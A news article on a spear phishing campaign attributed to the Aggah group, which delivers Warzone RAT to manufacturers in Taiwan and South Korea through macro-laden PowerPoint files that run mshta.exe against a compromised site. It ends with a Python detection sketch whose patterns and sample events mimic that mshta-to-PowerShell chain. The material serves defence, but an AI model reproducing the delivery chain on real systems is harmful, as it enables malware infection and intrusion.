New Phishing Threat Emerges, Delivering Malware To Manufacturing Firms

Marketers should be on the lookout for a new attempt by spear phishing artists to hijack their sites. 

The Pakistan-based threat actor Aggah is allegedly using sites to deliver Warzone RAT, a very dangerous form of malware, to manufacturing sites in Taiwan and South Korea, cyber security firm Anomali reports.

This summer’s campaign started with a custom email pretending to be from “foodHub.co.uk,” an online delivery service. 

“The email body includes order and shipping information as well as an attached PowerPoint file named ‘Purchase order 4500061977,pdf.ppam’ that contains obfuscated macros that use mshta.exe to execute JavaScript from a known compromised website, mail.hoteloscar.in/images/5[.]html,” researchers explained, according to Threatpost.

It's not clear how a hijacked foodHub.co.uk URL would have bamboozled manufacturing employees in Asia.

Hoteloscar.in, a website for a hotel in India, has also been compromised, leading researchers to believe that the threat actors may have exploited a WordPress vulnerability.

Anomali writes that it “discovered a spearphishing campaign that appears to have begun in early July 2021, targeting the manufacturing industry throughout Asia. The tactics, techniques, and procedures (TTPs) identified in this campaign align with the Aggah threat group.”

It continues, “Our analysis found multiple PowerPoint files that contained malicious macros that used MSHTA to execute a script utilizing PowerShell to load hex-encoded payloads. Based on the TTPs of this campaign, we assess with moderate confidence this is Aggah.”
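
The process chain the researchers describe (a PowerPoint macro launching mshta.exe against a remote URL, followed by PowerShell handling hex-encoded data) can be checked for in process-creation logs. The sketch below is an added example, not code from Anomali or this article; the event fields, rule names, host name and sample events are constructed for illustration.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

OFFICE = {"powerpnt.exe", "winword.exe", "excel.exe"}
REMOTE_URL = re.compile(r"https?://", re.I)
# Assumption: a hex-encoded payload shows up as >= 64 encoded bytes on the
# command line; payloads fetched at runtime need script-block logging instead.
HEX_RUN = re.compile(r"(?:[0-9a-f]{2}){64,}", re.I)

def classify(event):
    """Return the names of the rules that fire for one process-creation event."""
    parent = basename(event["parent_image"]).lower()
    child = basename(event["image"]).lower()
    cmd = event["command_line"]
    hits = []
    if parent in OFFICE and child == "mshta.exe":
        hits.append("office_spawns_mshta")
    if child == "mshta.exe" and REMOTE_URL.search(cmd):
        hits.append("mshta_remote_script")
    if parent == "mshta.exe" and child == "powershell.exe":
        hits.append("mshta_spawns_powershell")
    if child == "powershell.exe" and HEX_RUN.search(cmd):
        hits.append("powershell_long_hex_blob")
    return hits

def scan(events):
    """Return (pid, rules) for every event that matches at least one rule."""
    results = [(e["pid"], classify(e)) for e in events]
    return [(pid, hits) for pid, hits in results if hits]

def ev(pid, parent, image, cmd):
    return {"pid": pid, "parent_image": parent, "image": image, "command_line": cmd}

# Constructed sample events (simplified fields, placeholder host name).
SYS32 = "C:\\Windows\\System32\\"
PPT = "C:\\Program Files\\Microsoft Office\\root\\Office16\\POWERPNT.EXE"
PS = SYS32 + "WindowsPowerShell\\v1.0\\powershell.exe"
EVENTS = [
    ev(100, "C:\\Windows\\explorer.exe", PPT, 'POWERPNT.EXE "order.ppam"'),
    ev(101, PPT, SYS32 + "mshta.exe", "mshta.exe http://compromised.example/a.html"),
    ev(102, SYS32 + "mshta.exe", PS, "powershell.exe -c $h='" + "41" * 80 + "'"),
    ev(103, "C:\\Windows\\explorer.exe", PS, "powershell.exe Get-ChildItem"),
]

if __name__ == "__main__":
    for pid, hits in scan(EVENTS):
        print(pid, ", ".join(hits))
```

Only the mshta.exe and mshta-spawned PowerShell events match; the ordinary PowerPoint launch and the interactive PowerShell session do not.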

 
